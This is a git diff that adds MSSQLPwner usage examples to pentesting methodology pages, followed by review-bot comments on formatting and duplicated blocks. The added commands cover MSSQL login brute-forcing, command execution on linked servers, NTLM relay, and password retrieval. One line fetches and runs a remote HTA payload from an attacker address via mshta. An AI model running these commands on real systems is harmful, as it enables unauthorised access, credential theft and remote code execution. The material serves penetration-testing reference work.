diff --git a/generic-methodologies-and-resources/brute-force.md b/generic-methodologies-and-resources/brute-force.md index fc50a9f8bd2..19cf08ae9dc 100644 --- a/generic-methodologies-and-resources/brute-force.md +++ b/generic-methodologies-and-resources/brute-force.md @@ -287,10 +287,30 @@ legba mongodb --target localhost:27017 --username root --password data/passwords ### MSSQL +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt +``` + + ```bash legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433 ``` + ### MySQL ```bash diff --git a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md index 8c3ea5cb77e..01e30101606 100644 --- a/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md +++ b/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md 
@@ -90,6 +90,25 @@ msf> use windows/manage/mssql_local_auth_bypass #### Login + +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt +``` + ```bash # Using Impacket mssqlclient.py mssqlclient.py [-db volume] /:@ 
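Review bot: in this `#### Login` hunk two blank lines are added between the heading and the new `[MSSQLPwner](...)` line, while that line is glued directly to the ```` ```shell ```` fence; the rest of the README puts a single blank line between a heading, its tool link and the fence, so use one blank line in each place. The five `brute` commands here are a verbatim copy of the block added to brute-force.md in the same patch, so keep one representative line (for example `mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt`) and link to brute-force.md for the rest, otherwise the two copies will drift. In the comments, "hashes, and passwords" has a stray comma and "on the hosts.txt" should read "in hosts.txt".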
@@ -232,6 +251,21 @@ EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.1 '; DECLARE @x AS VARCHAR(100)='xp_cmdshell'; EXEC @x 'ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net' — ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) +```shell +# Executing custom assembly on the current server with windows authentication and executing hostname command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname + +# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate +``` + ### Steal NetNTLM hash / Relay attack You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example). 
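Review bot: the last comment in this RCE hunk says "Executing the hostname command ... with sp_oacreate method", but the command it describes runs `cmd /c mshta http://192.168.45.250/malicious.hta`; comment and command should agree, and since the point of the line is only the `-command-execution-method sp_oacreate` switch, use `exec hostname` there as the other three lines do. The `[MSSQLPwner](...)` line also follows the previous closing fence with no blank line, and the `-link-name SRV01` flag used here is spelled `-link-server DC01` later in this patch (abusing-ad-mssql.md); check the tool's argument parser and use the one spelling it accepts in every copy.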
@@ -248,6 +282,19 @@ sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) + +```shell +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 +``` + {% hint style="warning" %} You can check if who (apart sysadmins) has permissions to run those MSSQL functions with: diff --git a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md index 9771ba041a1..623c1a5eb4f 100644 --- a/windows-hardening/active-directory-methodology/abusing-ad-mssql.md +++ b/windows-hardening/active-directory-methodology/abusing-ad-mssql.md 
@@ -21,6 +21,76 @@ Learn & practice GCP Hacking: + +```shell +# Interactive mode +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive + +# Interactive mode with 2 depth level of impersonations +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -max-impersonation-depth 2 interactive + + +# Executing custom assembly on the current server with windows authentication and executing hostname command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth custom-asm hostname + +# Executing custom assembly on the current server with windows authentication and executing hostname command on the SRV01 linked server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 custom-asm hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec hostname + +# Executing the hostname command using stored procedures on the linked SRV01 server with sp_oacreate method +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate + +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 + +# Executing direct query +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth direct-query "SELECT CURRENT_USER" + +# Retrieving password from the linked server DC01 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 retrive-password + +# Execute code using custom 
assembly on the linked server DC01 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-server DC01 inject-custom-asm SqlInject.dll + +# Bruteforce using tickets, hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt -pl passwords.txt + +# Bruteforce using tickets against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -tl tickets.txt -ul users.txt + +# Bruteforce using passwords against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt + +# Bruteforce using hashes against the hosts listed on the hosts.txt +mssqlpwner hosts.txt brute -ul users.txt -hl hashes.txt + +``` + +### Enumerating from the network without domain session + +``` +# Interactive mode +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive +``` + +--- +### Powershell + The powershell module [PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) is very useful in this case. ```powershell diff --git a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md index 278da903023..35458752c8f 100644 --- a/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md +++ b/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md 
@@ -92,6 +92,20 @@ C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -S EXEC xp_dirtree '\\10.10.17.231\pwn', 1, 1 ``` +[MSSQLPwner](https://github.com/ScorpionesLabs/MSSqlPwner) + +```shell +# Issuing NTLM relay attack on the SRV01 server +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on chain ID 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -chain-id 2e9a3696-d8c2-4edd-9bcc-2908414eeb25 ntlm-relay 192.168.45.250 + +# Issuing NTLM relay attack on the local server with custom command +mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth ntlm-relay 192.168.45.250 +``` + + Or use this other technique: [https://github.com/p0dalirius/MSSQL-Analysis-Coerce](https://github.com/p0dalirius/MSSQL-Analysis-Coerce) ### Certutil
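Review bot: in the brute-force.md MSSQL hunk the new block is fenced ```` ```shell ```` while the existing legba block beside it, and the rest of that file, use ```` ```bash ````; match the file's fence. The `[MSSQLPwner](...)` line is also glued to the fence, and two blank lines are left between the new block and the legba block where the file uses one. The comments read "Bruteforce using hashes, and passwords against the hosts listed on the hosts.txt": drop the stray comma and say "listed in hosts.txt".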
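Review bot: in the README "Steal NetNTLM hash / Relay attack" hunk the third comment, "Issuing NTLM relay attack on the local server with custom command", does not match its command, which passes no command at all and differs from the first line only by omitting `-link-name SRV01`; reword it to "on the current server". The surrounding text tells the reader to start an SMB server to capture the hash, so say in a comment that the positional `192.168.45.250` is the address of that listener, otherwise the reader has no way to know what the argument is.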
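Review bot: in the abusing-ad-mssql.md hunk the new section "### Enumerating from the network without domain session" is contradicted by its only example, `mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth interactive`, which authenticates with domain credentials and is already the first line of the block above it; either show the form the heading promises or drop the section. Its fence also has no language tag where the file uses ```` ```bash ```` and ```` ```powershell ````. The large block above it is inserted with no heading or `[MSSQLPwner](...)` link naming the tool, unlike the other four pages, and contains double blank lines plus a blank line before the closing fence. `retrive-password` looks like a typo for `retrieve-password`; confirm the subcommand name against the tool before keeping it. `-link-server DC01` here versus `-link-name SRV01` in the other hunks cannot both be right. Since this is the fullest copy of the command list, keep it here and have the other pages link to it rather than paste five copies.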
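Review bot: in the printers-spooler-service-abuse.md hunk two blank lines separate the new block from "Or use this other technique:", where the file uses one, and the three `ntlm-relay` lines (including the mismatched "with custom command" comment) are the same block added to the MSSQL README in this patch; a one-line pointer to that README section would fit this page better than a third copy.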